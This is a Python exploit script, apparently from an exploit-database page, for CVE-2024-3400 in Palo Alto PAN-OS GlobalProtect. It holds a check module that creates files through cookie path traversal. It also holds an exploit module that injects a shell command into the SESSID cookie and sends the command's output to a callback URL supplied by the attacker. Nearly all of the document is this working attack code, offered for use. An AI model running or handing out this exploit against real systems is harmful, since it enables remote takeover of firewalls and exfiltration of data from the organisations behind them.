9eb5c7b425
7 changes to exploits/shellcodes/ghdb Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation FlatPress v1.3 - Remote Command Execution Laravel Framework 11 - Credential Leakage SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution Flowise 1.6.5 - Authentication Bypass
150 lines
No EOL
5.6 KiB
Text
150 lines
No EOL
5.6 KiB
Text
# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
|
|
# Date: 21 Apr 2024
|
|
# Exploit Author: Kr0ff
|
|
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
|
|
# Software Link: -
|
|
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
|
|
# PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
|
|
# PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
|
|
# Tested on: Debian
|
|
# CVE : CVE-2024-3400
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import sys
|
|
|
|
try:
|
|
import argparse
|
|
import requests
|
|
except ImportError:
|
|
print("Missing dependencies, either requests or argparse not installed")
|
|
sys.exit(2)
|
|
|
|
# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
|
|
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
|
|
|
|
def check_vuln(target: str, file: str) -> bool:
|
|
ret = False
|
|
|
|
uri = "/ssl-vpn/hipreport.esp"
|
|
|
|
s = requests.Session()
|
|
r = ""
|
|
|
|
headers = {
|
|
"User-Agent" : \
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
|
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
"Cookie": \
|
|
f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
|
|
}
|
|
|
|
headers_noCookie = {
|
|
"User-Agent" : \
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
|
|
}
|
|
|
|
if not "http://" or not "https://" in target:
|
|
target = "http://" + target
|
|
try:
|
|
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
|
|
except requests.exceptions.Timeout or requests.ConnectionError as e:
|
|
print(f"Request timed out for \"HTTP\" !{e}")
|
|
|
|
print("Trying with \"HTTPS\"...")
|
|
|
|
target = "https://" + target
|
|
try:
|
|
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
|
|
except requests.exceptions.Timeout or requests.ConnectionError as e:
|
|
print(f"Request timed out for \"HTTPS\"")
|
|
sys.exit(1)
|
|
else:
|
|
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
|
|
|
|
if r.status_code == 200:
|
|
r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
|
|
if r.status_code == 403:
|
|
print("Target vulnerable to CVE-2024-3400")
|
|
ret = True
|
|
else:
|
|
return ret
|
|
|
|
return ret
|
|
|
|
|
|
|
|
def cmdexec(target: str, callback_url: str, payload: str) -> bool:
|
|
ret = False
|
|
p = ""
|
|
|
|
if " " in payload:
|
|
p = payload.replace(" ", "${IFS)")
|
|
|
|
uri = "/ssl-vpn/hipreport.esp"
|
|
|
|
headers = {
|
|
"User-Agent" : \
|
|
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
|
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
"Cookie": \
|
|
f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"
|
|
|
|
}
|
|
|
|
s = requests.Session()
|
|
r = ""
|
|
|
|
if not "http://" or not "https://" in target:
|
|
target = "http://" + target
|
|
try:
|
|
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
|
|
except requests.exceptions.Timeout or requests.ConnectionError as e:
|
|
print(f"Request timed out for \"HTTP\" !{e}")
|
|
|
|
print("Trying with \"HTTPS\"...")
|
|
|
|
target = "https://" + target
|
|
try:
|
|
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
|
|
except requests.exceptions.Timeout or requests.ConnectionError as e:
|
|
print(f"Request timed out for \"HTTPS\"")
|
|
sys.exit(1)
|
|
else:
|
|
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
|
|
|
|
if not "Success" in r.text:
|
|
return ret
|
|
|
|
else:
|
|
ret = True
|
|
|
|
return ret
|
|
|
|
#Initilize parser for arguments
|
|
def argparser(selection=None):
|
|
parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
|
|
|
|
subparser = parser.add_subparsers( help="Available modules", dest="module")
|
|
|
|
exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
|
|
exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
|
|
exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
|
|
exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
|
|
#---------------------------------------
|
|
check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
|
|
check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
|
|
check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )
|
|
|
|
args = parser.parse_args(selection)
|
|
args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
|
|
|
|
if args.module == "exploit":
|
|
cmdexec(args.target, args.callbackurl, args.payload)
|
|
|
|
if args.module == "check":
|
|
check_vuln(args.target, args.filename)
|
|
|
|
if __name__ == "__main__":
|
|
argparser()
|
|
print("Finished !") |